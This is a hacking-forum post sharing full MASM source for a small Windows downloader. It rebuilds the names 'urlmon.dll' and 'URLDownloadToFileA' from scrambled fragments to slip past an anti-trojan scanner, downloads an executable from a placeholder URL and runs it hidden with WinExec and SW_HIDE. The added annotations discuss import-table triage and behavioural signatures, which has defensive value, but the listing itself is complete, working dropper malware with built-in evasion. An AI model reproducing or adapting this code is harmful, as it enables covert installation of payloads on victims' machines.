Underc0de - Hacking y seguridad informática


Título: Downloader MASM
Publicado por: ANTRAX en Junio 05, 2012, 04:42:49 pm
Código: ASM
  1. ;Tiny Webdownloader by Aphex
  2. ;Hides use of URLDownloadToFileA to foil TDS (TDS is not expanded on this page; presumably a signature-based anti-trojan scanner)
  3. ;http://iamaphex.cjb.net
  4. ;Analyst summary: 32-bit MASM, flat model, stdcall. Rebuilds "urlmon.dll" and "URLDownloadToFileA" at run time, resolves the API via LoadLibrary/GetProcAddress, fetches Url into Exe, then executes Exe. No return value is checked anywhere in this listing.
  5. .386
  6. .model flat, stdcall
  7. include \masm32\include\kernel32.inc   ;every invoke target below is a kernel32 export
  8. includelib \masm32\lib\kernel32.lib    ;only kernel32 is linked, so urlmon is not a static import; import-table triage would show LoadLibrary/GetProcAddress rather than URLDownloadToFileA
  9.  
  10. .data
  11. Url byte 'http://your.isp.goes.here/file.exe', 0   ;placeholder source URL; plain http, no transport integrity
  12. Exe byte '~.exe', 0                               ;relative file name, so it resolves against the process's current directory
  13. Scramble1 byte 'dll', 0        ;Scramble1-9: name fragments stored out of order as separate NUL-terminated strings;
  14. Scramble2 byte '.', 0          ;the full DLL/API names never appear contiguously in the file, but each fragment is still plaintext
  15. Scramble3 byte 'mon', 0
  16. Scramble4 byte 'url', 0
  17. Scramble5 byte 'A', 0
  18. Scramble6 byte 'File', 0
  19. Scramble7 byte 'To', 0
  20. Scramble8 byte 'Download', 0
  21. Scramble9 byte 'URL', 0
  22.  
  23. .data?
  24. UrlMonDll byte 11 dup (?)      ;exact fit: "urlmon.dll" is 10 characters plus the terminator
  25. UrlDownload byte 19 dup (?)    ;exact fit: "URLDownloadToFileA" is 18 characters plus the terminator
  26. UrlMon dword ?                 ;module handle returned by LoadLibrary
  27. UrlDownloadToFile dword ?      ;function pointer returned by GetProcAddress
  28.  
  29. .code
  30. _main:
  31. ;reassembles "urlmon.dll" in UrlMonDll: 'url' + 'mon' + '.' + 'dll'
  32. invoke lstrcpyn, addr UrlMonDll, addr Scramble4, 4   ;length 4 = three characters plus the terminator
  33. invoke lstrcat, addr UrlMonDll, addr Scramble3
  34. invoke lstrcat, addr UrlMonDll, addr Scramble2
  35. invoke lstrcat, addr UrlMonDll, addr Scramble1
  36.  
  37. ;reassembles "URLDownloadToFileA" in UrlDownload: 'URL' + 'Download' + 'To' + 'File' + 'A'
  38. invoke lstrcpyn, addr UrlDownload, addr Scramble9, 4 ;length 4 = three characters plus the terminator
  39. invoke lstrcat, addr UrlDownload, addr Scramble8
  40. invoke lstrcat, addr UrlDownload, addr Scramble7
  41. invoke lstrcat, addr UrlDownload, addr Scramble6
  42. invoke lstrcat, addr UrlDownload, addr Scramble5
  43.  
  44. ;loads urlmon.dll at run time; the module load is visible to image-load telemetry even though the import table does not name it
  45. invoke LoadLibrary, addr UrlMonDll
  46. mov UrlMon, eax                ;handle stored without a NULL check
  47.  
  48. ;resolves URLDownloadToFileA by name from the module just loaded
  49. invoke GetProcAddress, UrlMon, addr UrlDownload
  50. mov UrlDownloadToFile, eax     ;pointer stored without a NULL check
  51.  
  52. ;deletes any existing file named by Exe before the download; result ignored
  53. invoke DeleteFile, addr Exe
  54.  
  55. ;downloads Url to Exe; arguments are pushed by hand in reverse (stdcall) because the target is a run-time pointer, not a prototyped import
  56. push 0                         ;lpfnCB: no status callback
  57. push 0                         ;dwReserved
  58. push offset Exe                ;szFileName: destination path
  59. push offset Url                ;szURL: source
  60. push 0                         ;pCaller: none
  61. call UrlDownloadToFile         ;indirect call through the resolved pointer; the HRESULT in eax is never examined
  62.  
  63. ;executes the downloaded file with uCmdShow 0 (SW_HIDE); nothing verifies the file's origin or contents first. Behavioural signature: network fetch to a new .exe followed immediately by process creation from that file
  64. invoke WinExec, addr Exe, 0
  65.  
  66. ;exits with status 0 whether or not any earlier step succeeded
  67. invoke ExitProcess, 0
  68.  
  69. end _main

By X-Ray Cat